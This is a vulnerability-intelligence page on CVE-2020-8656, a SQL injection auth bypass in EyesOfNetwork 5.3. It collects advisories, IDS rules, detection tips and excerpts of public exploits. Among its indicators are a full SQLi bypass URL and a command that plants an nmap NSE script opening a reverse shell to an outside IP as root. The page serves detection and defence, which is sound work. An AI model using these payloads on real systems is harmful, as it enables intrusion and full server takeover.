CVE-2020-8656
published 2020-02-07CVE-2020-8656: An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various…
PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
84.60%
99.7th percentile
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eyesofnetwork | eyesofnetwork | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet↗
path/eonapi/getApiKey
command;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #↗
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)"; flow:established,to_server; http.uri; content:"/eonapi/getApiKey"; fast_pattern; content:"username="; nocase; startswith; pcre:"/^[^&=]*(?:union|select)/Ri"; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8657; reference:cve,2020-8656; classtype:attempted-admin; sid:2034310; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8656, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- →Detect SQL injection auth bypass attempts against the EyesOfNetwork API by monitoring HTTP GET requests to /eonapi/getApiKey where the username parameter contains UNION SELECT keywords. ↗
- →The exploit uses a distinctive hardcoded MD5 hash value '1c85d47ff80b5ff2a4dd577e8e5f8e9d' in the UNION SELECT payload as the injected password field; presence of this string in HTTP URI parameters is a high-confidence indicator of exploitation. ↗
- →A time-based blind SQLi probe uses sleep() in the username parameter; monitor for HTTP 401 responses to /eonapi/getApiKey with anomalously long response times (>=6 seconds) as a detection signal.
- →The exploit chain follows a predictable sequence: SQLi on /eonapi/getApiKey → POST to /eonapi/createEonUser → POST to /lilac/autodiscovery.php with a command-injected target[] parameter. Correlating these three endpoints in sequence from the same source IP is a strong indicator of full exploitation. ↗
- →The exploit uses a distinctive non-standard User-Agent string; alert on this UA in web server logs as an indicator of the public PoC tool being used. ↗
- →The command injection payload in the AutoDiscovery target field is prefixed with a semicolon and suffixed with a space and hash (;CMD #) to break out of the target context; monitor POST bodies to /lilac/autodiscovery.php for target[] values matching this pattern. ↗
- →Post-exploitation artifact: watch for creation of NSE script files in /tmp/ (e.g., /tmp/h4k) followed by execution of nmap with a -script flag pointing to /tmp/, indicating privilege escalation via the apache→root nmap sudo path. ↗
- ·The Nuclei template uses a stop-at-first-match strategy: it first tries the auth-bypass UNION SELECT request and only falls back to the time-based sleep probe if the first request does not return EONAPI_KEY. The time-based probe uses a 6-second sleep with a 20-second timeout; tuning these thresholds may be needed in high-latency environments. ↗
- ·The Metasploit module requires HTTPS (SSL: true) and defaults to port 443; running the module against HTTP-only targets will fail. ↗
- ·The module attempts API key generation via hardcoded key first; only if that fails does it fall back to SQL injection. Detection rules should cover both the hardcoded-key path (CVE-2020-8657) and the SQLi path (CVE-2020-8656) to avoid blind spots. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9vpp-5ch5-wr42: An issue was discovered in EyesOfNetwork 5
ghsa_unreviewed·2022-05-24
CVE-2020-8656 [HIGH] CWE-89 GHSA-9vpp-5ch5-wr42: An issue was discovered in EyesOfNetwork 5
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
VulnCheck
eyesofnetwork eyesofnetwork Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-8656 [CRITICAL] eyesofnetwork eyesofnetwork Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
eyesofnetwork eyesofnetwork Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
Affected: eyesofnetwork eyesofnetwork
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2020-8656; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-10&host_type=src&vulnerability=cve-2020-8656; https://dashboar
Suricata
ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)
suricata·2021-11-01·CVSS 9.8
CVE-2020-8657 [CRITICAL] ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)
ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)"; flow:established,to_server; http.uri; content:"/eonapi/getApiKey"; fast_pattern; content:"username="; nocase; startswith; pcre:"/^[^&=]*(?:union|select)/Ri"; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8657; reference:cve,2020-8656; classtype:attempted-admin; sid:2034310; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8656, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exp
Exploit-DB
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
exploitdb·2020-03-05
CVE-2020-8657 EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'EyesOfNetwork AutoDiscovery Target Command Execution',
'Description' => %q{
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3
and prior in order to execute arbitrary commands as root.
This module takes advantage of a command injection vulnerability in the
`target` parameter of the AutoDiscovery functionality within the EON web
interface in order to write an Nmap NSE script containing the payload to
disk. It then starts an Nmap scan to activate the payload. This results in
privilege escalation because the`apache` user can execute Nm
Exploit-DB
EyesOfNetwork 5.3 - Remote Code Execution
exploitdb·2020-02-07·CVSS 8.8
CVE-2020-8656 [HIGH] EyesOfNetwork 5.3 - Remote Code Execution
EyesOfNetwork 5.3 - Remote Code Execution
---
# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution
# Date: 2020-02-01
# Exploit Author: Clément Billac
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656
#!/bin/env python3
# coding: utf8
#
#
# CVE-2020-8654 - Discovery module to allows to run arbitrary OS commands
# We were able to run the 'id' command with the following payload in the target field : ';id #'.
#
# CVE-2020-8655 - LPE via nmap NSE script
# As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
# nmap version 6.40 is used and doesn't have
Nuclei
EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
nuclei·CVSS 8.8
CVE-2020-8654 [HIGH] EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.
Template:
id: CVE-2020-8654
info:
name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
author: praetorian-thendrickson
severity: high
description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context
Nuclei
EyesOfNetwork - Hardcoded API Key & SQL Injection
nuclei·CVSS 9.8
CVE-2020-8656 [CRITICAL] EyesOfNetwork - Hardcoded API Key & SQL Injection
EyesOfNetwork - Hardcoded API Key & SQL Injection
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
Template:
id: CVE-2020-8656
info:
name: EyesOfNetwork - Hardcoded API Key & SQL Injection
author: ritikchaddha
severity: critical
description: |
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
impact: |
Unauthenticated attackers can bypass authentication via SQL injection and
Metasploit
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
metasploit
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary commands as root. This module takes advantage of a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface in order to write an Nmap NSE script containing the payload to disk. It then starts an Nmap scan to activate the payload. This results in privilege escalation because the`apache` user can execute Nmap as root. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via various methods, depending on the EON version. EON 5.3 is vulnerable to a hardcoded API key and two SQL injectio
No writeups or analysis indexed.
http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.htmlhttps://github.com/EyesOfNetworkCommunity/eonapi/issues/16http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.htmlhttps://github.com/EyesOfNetworkCommunity/eonapi/issues/16
2020-02-07
Published
Exploited in the wild